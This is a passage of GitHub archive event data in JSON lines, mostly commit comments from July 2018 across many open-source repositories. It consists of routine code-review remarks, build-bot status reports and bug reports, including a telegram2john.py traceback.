Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-82e4f93434f67a118dee10e388f5f0cbd365000e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-12T12:41:08Z"}
{"id":"7955978364","type":"CommitCommentEvent","actor":{"login":"lexin"},"repo":{"name":"VoIPGRID/VialerSIPLib"},"payload":{"comment":{"id":29684640,"position":null,"line":null,"path":null,"commit_id":"dffcdf49a62476fcea9325a97452ccc444995020","created_at":"2018-07-12T12:42:01Z","updated_at":"2018-07-12T12:42:01Z","author_association":"NONE","body":"Am I right that you need to pass notificationUserInfo as userInfo - third parameter for postNotificationName. VSLCall.m line 464 ?  "}},"created_at":"2018-07-12T12:42:01Z"}
{"id":"7955983571","type":"CommitCommentEvent","actor":{"login":"Adyel"},"repo":{"name":"Adyel/OpenBangla-Keyboard"},"payload":{"comment":{"id":29684648,"position":null,"line":null,"path":null,"commit_id":"cf331ed8b18dcb90b6149234f9fbe166ae1742e1","created_at":"2018-07-12T12:43:03Z","updated_at":"2018-07-12T12:43:03Z","author_association":"OWNER","body":"@mominul  No, The formatting comes with [CLion](https://www.jetbrains.com/clion/). I am used to [JetBrains](https://www.jetbrains.com/) products (They are top of the line). It has an option to optimize the import and format code, I used that. You can just check the front end --> `*.ui` files. I only changed those."}},"created_at":"2018-07-12T12:43:03Z"}
{"id":"7955984064","type":"CommitCommentEvent","actor":{"login":"nsamsono"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29684652,"position":null,"line":null,"path":null,"commit_id":"17771ccf9dd0bc651f094899861560b03efedbce","created_at":"2018-07-12T12:43:10Z","updated_at":"2018-07-12T12:43:10Z","author_association":"NONE","body":"Is this change necessary? May be we can add some default configuration in PMD?\r\nCurrently, there was a decision not to change DPDK application, except of severe bugs (that also need to check with community)"}},"created_at":"2018-07-12T12:43:10Z"}
{"id":"7955985584","type":"CommitCommentEvent","actor":{"login":"daehn"},"repo":{"name":"wireapp/wire-ios"},"payload":{"comment":{"id":29684654,"position":26,"line":54,"path":"Wire-iOS/Sources/UserInterface/ConversationList/ConversationListViewController+DataUsagePermissions.swift","commit_id":"65df3c745dbe8f2b49385fd09ae8a4a6fa7966ca","created_at":"2018-07-12T12:43:27Z","updated_at":"2018-07-12T12:43:27Z","author_association":"CONTRIBUTOR","body":"Just wondering if the change makes a difference, e.g. checking `TrackingManager.shared.disableCrashAndAnalyticsSharing` like before or checking `!(TrackingManager.shared.disableCrashAndAnalyticsSharing == false)`, maybe I am missing something, but it seems like it's doing the same or not?"}},"created_at":"2018-07-12T12:43:27Z"}
{"id":"7955991802","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29684662,"position":1,"line":1,"path":"compiler/testData/codegen/box/reflection/properties/boundJvmFieldInInterfaceCompanion.kt","commit_id":"335448b4bb105bd093dd89d2cb1af51dde41e462","created_at":"2018-07-12T12:44:38Z","updated_at":"2018-07-12T12:44:38Z","author_association":"MEMBER","body":"I think this test is not needed, it tests exactly the same behavior as `jvmFieldInInterfaceCompanion.kt`"}},"created_at":"2018-07-12T12:44:38Z"}
{"id":"7955995591","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29684675,"position":12,"line":12,"path":"compiler/testData/codegen/box/jvmField/interfaceCompanion.kt","commit_id":"335448b4bb105bd093dd89d2cb1af51dde41e462","created_at":"2018-07-12T12:45:20Z","updated_at":"2018-07-12T12:45:20Z","author_association":"MEMBER","body":"Please modify at least one test by adding more than one `@JvmField` property in the same class"}},"created_at":"2018-07-12T12:45:20Z"}
{"id":"7956001743","type":"CommitCommentEvent","actor":{"login":"SpEcHiDe"},"repo":{"name":"K1DD0SC4LLM3NOOB/mariebot-malayalam"},"payload":{"comment":{"id":29684684,"position":null,"line":null,"path":null,"commit_id":"16742b8f10de603cd64f97cf85aad9f3737cee3b","created_at":"2018-07-12T12:46:28Z","updated_at":"2018-07-12T12:46:28Z","author_association":"NONE","body":"എന്തിന്നോ വേണ്ടി തിളയ്ക്കുന്ന സാമ്പാർ !!"}},"created_at":"2018-07-12T12:46:28Z"}
{"id":"7956002393","type":"CommitCommentEvent","actor":{"login":"mominul"},"repo":{"name":"Adyel/OpenBangla-Keyboard"},"payload":{"comment":{"id":29684688,"position":null,"line":null,"path":null,"commit_id":"cf331ed8b18dcb90b6149234f9fbe166ae1742e1","created_at":"2018-07-12T12:46:35Z","updated_at":"2018-07-12T12:46:35Z","author_association":"NONE","body":"Have you used `OpenBanglaKeyboardFrontendUI.pro` to edit those `.ui` files in QT Creator?"}},"created_at":"2018-07-12T12:46:35Z"}
{"id":"7956004244","type":"CommitCommentEvent","actor":{"login":"Noxxxious"},"repo":{"name":"djmax81/MadMax_kernel_Universal8895"},"payload":{"comment":{"id":29684697,"position":null,"line":null,"path":null,"commit_id":"d936881ae251f11b07276f788cfe87a8216cc8dd","created_at":"2018-07-12T12:46:57Z","updated_at":"2018-07-12T12:46:57Z","author_association":"NONE","body":"git commit --amend --author=\"Noxxxious <f.catzgerald@gmail.com>\" or @Noxxxious\r\n\r\n"}},"created_at":"2018-07-12T12:46:57Z"}
{"id":"7956009725","type":"CommitCommentEvent","actor":{"login":"nsamsono"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29684713,"position":null,"line":null,"path":null,"commit_id":"5b23960f2834e91c6be30acc24a67aaa9829c612","created_at":"2018-07-12T12:47:59Z","updated_at":"2018-07-12T12:47:59Z","author_association":"NONE","body":"Is this patch related to previous patch (net/lport: mark every p-port as owned) or some other issue?\r\nAs I mentioned in testpmd patch, there was a decision not to change DPDK application, except of severe bugs (that also need to check with community)"}},"created_at":"2018-07-12T12:47:59Z"}
{"id":"7956012740","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29684719,"position":2,"line":1,"path":"compiler/testData/diagnostics/testsWithStdLib/annotations/jvmField/jvmFieldApplicability.kt","commit_id":"335448b4bb105bd093dd89d2cb1af51dde41e462","created_at":"2018-07-12T12:48:31Z","updated_at":"2018-07-12T12:48:31Z","author_association":"MEMBER","body":"Let's not disable features in tests unless it's required to test how the compiler works with a previous language version.\r\n\r\nWe can fix this test by adding extra non-`@JvmField` property to each class where `INAPPLICABLE_JVM_FIELD` is no longer reported"}},"created_at":"2018-07-12T12:48:31Z"}
{"id":"7956013971","type":"CommitCommentEvent","actor":{"login":"Noxxxious"},"repo":{"name":"djmax81/MadMax_kernel_Universal8895"},"payload":{"comment":{"id":29684725,"position":null,"line":null,"path":null,"commit_id":"d6598dc1881af23516c79ca30eec9e924ba3c3d0","created_at":"2018-07-12T12:48:46Z","updated_at":"2018-07-12T12:48:46Z","author_association":"NONE","body":"git commit --amend --author=\"Noxxxious f.catzgerald@gmail.com\" or @Noxxxious"}},"created_at":"2018-07-12T12:48:46Z"}
{"id":"7956016977","type":"CommitCommentEvent","actor":{"login":"Adyel"},"repo":{"name":"Adyel/OpenBangla-Keyboard"},"payload":{"comment":{"id":29684739,"position":null,"line":null,"path":null,"commit_id":"cf331ed8b18dcb90b6149234f9fbe166ae1742e1","created_at":"2018-07-12T12:49:19Z","updated_at":"2018-07-12T12:49:19Z","author_association":"OWNER","body":"@mominul  I did not find any `.pro` file in the repo. So, I treated it as a cmake project. I used QT Creator to edit the UI files one by one"}},"created_at":"2018-07-12T12:49:19Z"}
{"id":"7956020569","type":"CommitCommentEvent","actor":{"login":"satyamagni"},"repo":{"name":"satyamagni/project"},"payload":{"comment":{"id":29684745,"position":null,"line":null,"path":null,"commit_id":"6eddc9431d2e09ee43a3d20e2ee710eb6dec0540","created_at":"2018-07-12T12:50:00Z","updated_at":"2018-07-12T12:50:00Z","author_association":"OWNER","body":"vhbjbj"}},"created_at":"2018-07-12T12:50:00Z"}
{"id":"7956024506","type":"CommitCommentEvent","actor":{"login":"nicolas-grekas"},"repo":{"name":"symfony/symfony"},"payload":{"comment":{"id":29684760,"position":4,"line":4,"path":".github/CODEOWNERS","commit_id":"8c62ecfad2001fe062559fd4a2f8893c31500411","created_at":"2018-07-12T12:50:43Z","updated_at":"2018-07-12T12:50:43Z","author_association":"MEMBER","body":"No need to put me code owner of anything :)"}},"created_at":"2018-07-12T12:50:43Z"}
{"id":"7956029048","type":"CommitCommentEvent","actor":{"login":"nfl-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29684768,"position":10,"line":342,"path":"addons/account/models/account_payment.py","commit_id":"75857a2c34611c496c949ee5cd16fa809f31e455","created_at":"2018-07-12T12:51:33Z","updated_at":"2018-07-12T12:51:33Z","author_association":"NONE","body":"You still ignoring the context default value when {'default_journal_id': False}\r\nthe check should be:\r\nif default_journal_id is None:"}},"created_at":"2018-07-12T12:51:33Z"}
{"id":"7956030857","type":"CommitCommentEvent","actor":{"login":"hanhou"},"repo":{"name":"hanhou/Labtools"},"payload":{"comment":{"id":29684771,"position":59,"line":46,"path":"submit_job_ind.sh","commit_id":"d748f79ecd3e9ede74cb5f7cbe0259b7684e750b","created_at":"2018-07-12T12:51:53Z","updated_at":"2018-07-12T12:51:53Z","author_association":"OWNER","body":"qsub 这句话应该放在 for ii in `seq 1 5`  循环的外面，再 for 循环一次，因为这里 config[] 还没有填充完毕，会导致前面几个 node 接收不到后面 node 的信息，从而 matlab 中分配任务错误。"}},"created_at":"2018-07-12T12:51:53Z"}
{"id":"7956032781","type":"CommitCommentEvent","actor":{"login":"ensonic"},"repo":{"name":"rishabhdeepsingh/robertalab"},"payload":{"comment":{"id":29684778,"position":null,"line":null,"path":null,"commit_id":"739f03c58d13b43a3d36d01a9ff0bd34f80d15f7","created_at":"2018-07-12T12:52:15Z","updated_at":"2018-07-12T12:52:15Z","author_association":"NONE","body":"Can we do this from java when the file is not present?"}},"created_at":"2018-07-12T12:52:15Z"}
{"id":"7956032941","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29684779,"position":null,"line":null,"path":null,"commit_id":"c31e23de8d7f2f21bf99ec3a9b1e057501a0462f","created_at":"2018-07-12T12:52:16Z","updated_at":"2018-07-12T12:52:16Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - i386-Windows-7-VisualStudio-14: OK (2935 of 2935 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c31e23de8d7f2f21bf99ec3a9b1e057501a0462f-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c31e23de8d7f2f21bf99ec3a9b1e057501a0462f-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T12:52:16Z"}
{"id":"7956037874","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29684791,"position":5,"line":102,"path":"libraries/stdlib/jvm/runtime/kotlin/jvm/annotations/JvmPlatformAnnotations.kt","commit_id":"335448b4bb105bd093dd89d2cb1af51dde41e462","created_at":"2018-07-12T12:53:11Z","updated_at":"2018-07-12T12:53:11Z","author_association":"MEMBER","body":"Has this been discussed at a design meeting?"}},"created_at":"2018-07-12T12:53:11Z"}
{"id":"7956039603","type":"CommitCommentEvent","actor":{"login":"mominul"},"repo":{"name":"Adyel/OpenBangla-Keyboard"},"payload":{"comment":{"id":29684793,"position":null,"line":null,"path":null,"commit_id":"cf331ed8b18dcb90b6149234f9fbe166ae1742e1","created_at":"2018-07-12T12:53:29Z","updated_at":"2018-07-12T12:53:29Z","author_association":"NONE","body":"https://github.com/OpenBangla/OpenBangla-Keyboard/blob/master/src/frontend/OpenBanglaKeyboardFrontendUI.pro The file is in the frontend directory :slightly_smiling_face:"}},"created_at":"2018-07-12T12:53:29Z"}
{"id":"7956041813","type":"CommitCommentEvent","actor":{"login":"vothebasedawg"},"repo":{"name":"vothebasedawg/emptysheet5"},"payload":{"comment":{"id":29684797,"position":3,"line":3,"path":"Uh i flexe iz besser aus du.txt","commit_id":"679c8fd57c25219e38fd87dc68a0e442a02f8df8","created_at":"2018-07-12T12:53:51Z","updated_at":"2018-07-12T12:53:51Z","author_association":"OWNER","body":"is it funny though?"}},"created_at":"2018-07-12T12:53:51Z"}
{"id":"7956043207","type":"CommitCommentEvent","actor":{"login":"zhouzhongguang"},"repo":{"name":"banchichen/TZImagePickerController"},"payload":{"comment":{"id":29684800,"position":5,"line":375,"path":"TZImagePickerController/TZImagePickerController/TZImageManager.m","commit_id":"385a327dc17498193384c9e88ac686ffb0e10d91","created_at":"2018-07-12T12:54:06Z","updated_at":"2018-07-12T12:54:06Z","author_association":"NONE","body":"iOS11之后才能用@available()这个语法，也就是说xcode8这段代码会编译报错"}},"created_at":"2018-07-12T12:54:06Z"}
{"id":"7956043299","type":"CommitCommentEvent","actor":{"login":"hanhou"},"repo":{"name":"hanhou/Labtools"},"payload":{"comment":{"id":29684801,"position":59,"line":46,"path":"submit_job_ind.sh","commit_id":"d748f79ecd3e9ede74cb5f7cbe0259b7684e750b","created_at":"2018-07-12T12:54:07Z","updated_at":"2018-07-12T12:54:07Z","author_association":"OWNER","body":"我的最新 commit 已经修改了这个 bug，并且把之前手动设置的功能也融合进来了。如果不带参数，就自动设置（24 减去已占用 CPU数再减去 4，给服务器留几个 CPU）；如果带参数，就用之前的手动逻辑。"}},"created_at":"2018-07-12T12:54:07Z"}
{"id":"7956043782","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29684802,"position":4,"line":70,"path":"compiler/util/src/org/jetbrains/kotlin/config/LanguageVersionSettings.kt","commit_id":"335448b4bb105bd093dd89d2cb1af51dde41e462","created_at":"2018-07-12T12:54:12Z","updated_at":"2018-07-12T12:54:12Z","author_association":"MEMBER","body":"I'd say it's `UNSTABLE_FEATURE`"}},"created_at":"2018-07-12T12:54:12Z"}
{"id":"7956047405","type":"CommitCommentEvent","actor":{"login":"ensonic"},"repo":{"name":"rishabhdeepsingh/robertalab"},"payload":{"comment":{"id":29684809,"position":13,"line":61,"path":"OpenRobertaParent/OpenRobertaServer/staticResources/index.html","commit_id":"2bea3101fda293bc1c6a7dace31d97c653d1ebeb","created_at":"2018-07-12T12:54:50Z","updated_at":"2018-07-12T12:54:50Z","author_association":"NONE","body":"unwanted change? Make a small commit, then rebase and squash/fixup"}},"created_at":"2018-07-12T12:54:50Z"}
{"id":"7956048772","type":"CommitCommentEvent","actor":{"login":"zhouzhongguang"},"repo":{"name":"banchichen/TZImagePickerController"},"payload":{"comment":{"id":29684813,"position":5,"line":375,"path":"TZImagePickerController/TZImagePickerController/TZImageManager.m","commit_id":"385a327dc17498193384c9e88ac686ffb0e10d91","created_at":"2018-07-12T12:55:05Z","updated_at":"2018-07-12T12:55:05Z","author_association":"NONE","body":"而且这里加的范围不对，应该是针对代码中所有的版本判断都要加"}},"created_at":"2018-07-12T12:55:05Z"}
{"id":"7956050210","type":"CommitCommentEvent","actor":{"login":"ensonic"},"repo":{"name":"rishabhdeepsingh/robertalab"},"payload":{"comment":{"id":29684814,"position":5,"line":54,"path":"OpenRobertaParent/OpenRobertaServer/staticResources/index.html","commit_id":"2bea3101fda293bc1c6a7dace31d97c653d1ebeb","created_at":"2018-07-12T12:55:20Z","updated_at":"2018-07-12T12:55:20Z","author_association":"NONE","body":"I don't think you want to pull jquery here, I also don't see it beein used below."}},"created_at":"2018-07-12T12:55:20Z"}
{"id":"7956051338","type":"CommitCommentEvent","actor":{"login":"dmbala"},"repo":{"name":"opensciencegrid/user-school-2018"},"payload":{"comment":{"id":29684819,"position":null,"line":null,"path":null,"commit_id":"4e0d5ba15ed2096e80dd208ea955068bc1eaab73","created_at":"2018-07-12T12:55:32Z","updated_at":"2018-07-12T12:55:32Z","author_association":"COLLABORATOR","body":"correction to tensorflow path in the slide"}},"created_at":"2018-07-12T12:55:32Z"}
{"id":"7956052281","type":"CommitCommentEvent","actor":{"login":"msgodf"},"repo":{"name":"fnproject/fn_go"},"payload":{"comment":{"id":29684821,"position":null,"line":null,"path":null,"commit_id":"75cd5ff29c755d04bc11efc0ebde6b9f141d2bd3","created_at":"2018-07-12T12:55:42Z","updated_at":"2018-07-12T12:55:42Z","author_association":"MEMBER","body":"LGTM. Unless the intention was to make the normal `APIClient()` v2 _only_ then this doesn't look right, and breaks the CLI with the Oracle provider against v1."}},"created_at":"2018-07-12T12:55:42Z"}
{"id":"7956054355","type":"CommitCommentEvent","actor":{"login":"ensonic"},"repo":{"name":"rishabhdeepsingh/robertalab"},"payload":{"comment":{"id":29684825,"position":6,"line":8,"path":"OpenRobertaParent/OpenRobertaServer/staticResources/js/singleUser.js","commit_id":"2bea3101fda293bc1c6a7dace31d97c653d1ebeb","created_at":"2018-07-12T12:56:06Z","updated_at":"2018-07-12T12:56:06Z","author_association":"NONE","body":"It would be better to not add the gallery in the first place."}},"created_at":"2018-07-12T12:56:06Z"}
{"id":"7956059062","type":"CommitCommentEvent","actor":{"login":"Adyel"},"repo":{"name":"Adyel/OpenBangla-Keyboard"},"payload":{"comment":{"id":29684835,"position":null,"line":null,"path":null,"commit_id":"cf331ed8b18dcb90b6149234f9fbe166ae1742e1","created_at":"2018-07-12T12:56:58Z","updated_at":"2018-07-12T12:56:58Z","author_association":"OWNER","body":"@mominul Oh! Did not notice that. There was no project file at the main directory. So, I took it as an IDE independent project. It does not matter, either way. It should work as suppose to as I did not change any fileName."}},"created_at":"2018-07-12T12:56:58Z"}
{"id":"7956059239","type":"CommitCommentEvent","actor":{"login":"ensonic"},"repo":{"name":"rishabhdeepsingh/robertalab"},"payload":{"comment":{"id":29684837,"position":6,"line":172,"path":"OpenRobertaParent/OpenRobertaServer/src/main/resources/create-tables.sql","commit_id":"a0614258f8d56cdefb9d7546482833945b756f19","created_at":"2018-07-12T12:57:01Z","updated_at":"2018-07-12T12:57:01Z","author_association":"NONE","body":"why TEACHER?"}},"created_at":"2018-07-12T12:57:01Z"}
{"id":"7956061937","type":"CommitCommentEvent","actor":{"login":"ensonic"},"repo":{"name":"rishabhdeepsingh/robertalab"},"payload":{"comment":{"id":29684841,"position":1,"line":1,"path":"run.sh","commit_id":"a0614258f8d56cdefb9d7546482833945b756f19","created_at":"2018-07-12T12:57:30Z","updated_at":"2018-07-12T12:57:30Z","author_association":"NONE","body":"this change should not be part of this commit, right?"}},"created_at":"2018-07-12T12:57:30Z"}
{"id":"7956062938","type":"CommitCommentEvent","actor":{"login":"mominul"},"repo":{"name":"Adyel/OpenBangla-Keyboard"},"payload":{"comment":{"id":29684842,"position":null,"line":null,"path":null,"commit_id":"cf331ed8b18dcb90b6149234f9fbe166ae1742e1","created_at":"2018-07-12T12:57:41Z","updated_at":"2018-07-12T12:57:41Z","author_association":"NONE","body":"Ok, I will check those `.ui` files and inform you if there is anything wrong."}},"created_at":"2018-07-12T12:57:41Z"}
{"id":"7956064431","type":"CommitCommentEvent","actor":{"login":"PolyacovYury"},"repo":{"name":"PolyacovYury/PYmods"},"payload":{"comment":{"id":29684844,"position":5,"line":52,"path":"source/scripts/client/gui/mods/mod_RemodEnabler/config.py","commit_id":"e662d7ac0066024bd6dc3c6b7eaae2a5cffd7858","created_at":"2018-07-12T12:57:56Z","updated_at":"2018-07-12T12:57:56Z","author_association":"OWNER","body":"I would be very grateful, if someone could explain to me, how the hell did this happen."}},"created_at":"2018-07-12T12:57:56Z"}
{"id":"7956064732","type":"CommitCommentEvent","actor":{"login":"anacarolinaN"},"repo":{"name":"CleitonJB/TechFix_New"},"payload":{"comment":{"id":29684845,"position":null,"line":null,"path":null,"commit_id":"e21f9a9315aaced168b894de036a5644a94eb842","created_at":"2018-07-12T12:57:59Z","updated_at":"2018-07-12T12:57:59Z","author_association":"COLLABORATOR","body":"Revisando arquivos organizados..."}},"created_at":"2018-07-12T12:57:59Z"}
{"id":"7956068207","type":"CommitCommentEvent","actor":{"login":"ensonic"},"repo":{"name":"rishabhdeepsingh/robertalab"},"payload":{"comment":{"id":29684852,"position":null,"line":null,"path":null,"commit_id":"15b9d011a49a33d367afe37fc1a78f00739742d2","created_at":"2018-07-12T12:58:36Z","updated_at":"2018-07-12T12:58:36Z","author_association":"NONE","body":"Can you squash/fixup with the previous attempt?"}},"created_at":"2018-07-12T12:58:36Z"}
{"id":"7956068422","type":"CommitCommentEvent","actor":{"login":"torerobo"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":29684853,"position":null,"line":null,"path":null,"commit_id":"8c46810e588e45b0753b8c4d2f254c321fb0c6af","created_at":"2018-07-12T12:58:38Z","updated_at":"2018-07-12T12:58:38Z","author_association":"NONE","body":"error (OS Parrot 4.1) Parser Android 6.0\r\n./telegram2john.py '...shared_prefs'\r\nTraceback (most recent call last):\r\n  File \"./telegram2john.py\", line 176, in <module>\r\n    process_xml_file(sys.argv[j])\r\n  File \"./telegram2john.py\", line 139, in process_xml_file\r\n    tree = ET.parse(filename)\r\n  File \"/usr/lib/python3.6/xml/etree/ElementTree.py\", line 1196, in parse\r\n    tree.parse(source, parser)\r\n  File \"/usr/lib/python3.6/xml/etree/ElementTree.py\", line 586, in parse\r\n    source = open(source, \"rb\")\r\nIsADirectoryError: [Errno 21] Is a directory: '.../shared_prefs'\r\n\r\nChecked. Windows in some versions of Telegram needs to specify the path to the default directory Telegramdesktop. Linux is true. Android could **not** mistake. You need to update the documentation on Telegram.\r\n"}},"created_at":"2018-07-12T12:58:38Z"}
{"id":"7956073516","type":"CommitCommentEvent","actor":{"login":"CristinaVirlann"},"repo":{"name":"ip-exchange/ipsx-ios"},"payload":{"comment":{"id":29684859,"position":null,"line":null,"path":null,"commit_id":"1b81671c15acc431227d7bfbc467a8489e47a95d","created_at":"2018-07-12T12:59:34Z","updated_at":"2018-07-12T12:59:34Z","author_association":"CONTRIBUTOR","body":"- celula \"Make payment in\" nu e ca in design : https://zpl.io/2GmENYJ \"Account\" are alt font & culoare, butonul de Copy e diferit : font si pozitionare\r\n- in lista cu depozitele nu ai separator sus, la prima celula\r\n- se vede diferenta de culoare pt masca de sub \"Create Deposit\" button\r\n- la scroll, masca se vede urat"}},"created_at":"2018-07-12T12:59:34Z"}
{"id":"7956074703","type":"CommitCommentEvent","actor":{"login":"Yahyaali1"},"repo":{"name":"Yahyaali1/WeatherAppTest"},"payload":{"comment":{"id":29684863,"position":null,"line":null,"path":null,"commit_id":"eb7e8fb0c3ea8d92a5c2eaa708a0f2a16956932f","created_at":"2018-07-12T12:59:46Z","updated_at":"2018-07-12T12:59:46Z","author_association":"OWNER","body":"-Additions \r\n\r\n1. Location Activity \r\n2. Adapter to Location Activity \r\n3. Popup Dialogue Box \r\n4. Fixing Issues with \r\n5. Addition of Room Interface, Dao & Entity Classes \r\n\r\n-Issues \r\n1. Type converter for date is missing "}},"created_at":"2018-07-12T12:59:46Z"}
{"id":"7956075844","type":"CommitCommentEvent","actor":{"login":"rosscado"},"repo":{"name":"rosscado/raceready"},"payload":{"comment":{"id":29684865,"position":null,"line":null,"path":null,"commit_id":"88d148984e4c9a07e6fa72baa574194d8b23652a","created_at":"2018-07-12T12:59:58Z","updated_at":"2018-07-12T12:59:58Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/0fc11092-0119-4ab8-a5f0-6cbf19d20e03?env_id=ibm%3Ayp%3Aeu-gb \"drivetrain\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/8de9b026-388d-4ebc-984e-5928d63a1d84?env_id=ibm%3Ayp%3Aeu-gb \"drivetrain\") deployed [raceready](https://github.com/rosscado/raceready/releases/tag/deploy-ibm-yp-eu-gb-VeloWare-staging-20180712-125956 \"deploy-ibm-yp-eu-gb-VeloWare-staging-20180712-125956\") to [staging](https://console.bluemix.net/apps/23d83a9d-7943-46e3-b4ec-d36604aa66e2?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:VeloWare:staging\"), including this commit"}},"created_at":"2018-07-12T12:59:58Z"}
{"id":"7956076977","type":"CommitCommentEvent","actor":{"login":"romoore"},"repo":{"name":"material-components/material-components-ios"},"payload":{"comment":{"id":29684869,"position":null,"line":null,"path":null,"commit_id":"81a32e1aa25c2ce44b9ca97e1af19862e2475abf","created_at":"2018-07-12T13:00:10Z","updated_at":"2018-07-12T13:00:10Z","author_association":"CONTRIBUTOR","body":"Hmm, this is distressing. We should really be fixing this theming bug in MDCNavigationBar or MDCButtonBar (wherever the bug is) instead of having to address it in individual VCs. "}},"created_at":"2018-07-12T13:00:10Z"}
{"id":"7956078832","type":"CommitCommentEvent","actor":{"login":"exploitagency"},"repo":{"name":"exploitagency/vanitygen-plus"},"payload":{"comment":{"id":29684876,"position":null,"line":null,"path":null,"commit_id":"b3c90c1040b56c4508fed837652855dc0e74f468","created_at":"2018-07-12T13:00:26Z","updated_at":"2018-07-12T13:00:26Z","author_association":"OWNER","body":"If I recall the loading patterns text was actually a popular requested feature because people thought it was freezing on massive files, can you instead add a flag to optionally disable this?"}},"created_at":"2018-07-12T13:00:26Z"}
{"id":"7956080021","type":"CommitCommentEvent","actor":{"login":"jaykuhl"},"repo":{"name":"jaykuhl/ruby"},"payload":{"comment":{"id":29684883,"position":4,"line":8,"path":"getnum.rb","commit_id":"de40ec3c9665aab3bad048bbcc5ba9558997eb0e","created_at":"2018-07-12T13:00:37Z","updated_at":"2018-07-12T13:00:37Z","author_association":"OWNER","body":"This was Matty."}},"created_at":"2018-07-12T13:00:37Z"}
{"id":"7956083117","type":"CommitCommentEvent","actor":{"login":"laurentalacoque"},"repo":{"name":"laurentalacoque/TouchSelfie"},"payload":{"comment":{"id":29684889,"position":null,"line":null,"path":null,"commit_id":"86798812c58f8e4aa1f224bc4f85364b1dea308c","created_at":"2018-07-12T13:01:08Z","updated_at":"2018-07-12T13:01:08Z","author_association":"OWNER","body":"Photo title previously appeared as \"2018 13:23:43\" instead of \"04/03/2018 13:23:43\""}},"created_at":"2018-07-12T13:01:08Z"}
{"id":"7956086061","type":"CommitCommentEvent","actor":{"login":"nlhiorth"},"repo":{"name":"usit-gd/mreg"},"payload":{"comment":{"id":29684898,"position":null,"line":null,"path":null,"commit_id":"4aab30cc1d9f1e3987fee552a31147c3bdae422b","created_at":"2018-07-12T13:01:38Z","updated_at":"2018-07-12T13:01:38Z","author_association":"COLLABORATOR","body":"This solves #33 "}},"created_at":"2018-07-12T13:01:38Z"}
{"id":"7956088652","type":"CommitCommentEvent","actor":{"login":"navidsky"},"repo":{"name":"Stitch626/teeworlds-infclass"},"payload":{"comment":{"id":29684903,"position":null,"line":null,"path":null,"commit_id":"c455bdb817d989c87d070cc9030067e95fde1897","created_at":"2018-07-12T13:02:06Z","updated_at":"2018-07-12T13:02:06Z","author_association":"NONE","body":"have problem to bam for compile on linux"}},"created_at":"2018-07-12T13:02:06Z"}
{"id":"7956092886","type":"CommitCommentEvent","actor":{"login":"ZimuKing"},"repo":{"name":"ZimuKing/FirstProgram"},"payload":{"comment":{"id":29684913,"position":null,"line":null,"path":null,"commit_id":"fb00abc96cffe3934f459464253e7ef2e06158c6","created_at":"2018-07-12T13:02:49Z","updated_at":"2018-07-12T13:02:49Z","author_association":"OWNER","body":"..."}},"created_at":"2018-07-12T13:02:49Z"}
{"id":"7956093443","type":"CommitCommentEvent","actor":{"login":"ZimuKing"},"repo":{"name":"ZimuKing/FirstProgram"},"payload":{"comment":{"id":29684914,"position":null,"line":null,"path":null,"commit_id":"fb00abc96cffe3934f459464253e7ef2e06158c6","created_at":"2018-07-12T13:02:55Z","updated_at":"2018-07-12T13:02:55Z","author_association":"OWNER","body":"..."}},"created_at":"2018-07-12T13:02:55Z"}
{"id":"7956104571","type":"CommitCommentEvent","actor":{"login":"regener"},"repo":{"name":"alliedmodders/amxmodx"},"payload":{"comment":{"id":29684930,"position":null,"line":null,"path":null,"commit_id":"afbb3b88d77281f8818541ec72671d21629ec237","created_at":"2018-07-12T13:04:54Z","updated_at":"2018-07-12T13:04:54Z","author_association":"CONTRIBUTOR","body":"Wow, the description gone crazy, half of it was in the previous one :D\r\n"}},"created_at":"2018-07-12T13:04:54Z"}
{"id":"7956105599","type":"CommitCommentEvent","actor":{"login":"TiagoKnow"},"repo":{"name":"bachilli/Laravel-AdminLTE"},"payload":{"comment":{"id":29684931,"position":null,"line":null,"path":null,"commit_id":"b8997af19eef37199d95dee36ecd1551765545fb","created_at":"2018-07-12T13:05:06Z","updated_at":"2018-07-12T13:05:06Z","author_association":"NONE","body":"Solved and very much the problem!"}},"created_at":"2018-07-12T13:05:06Z"}
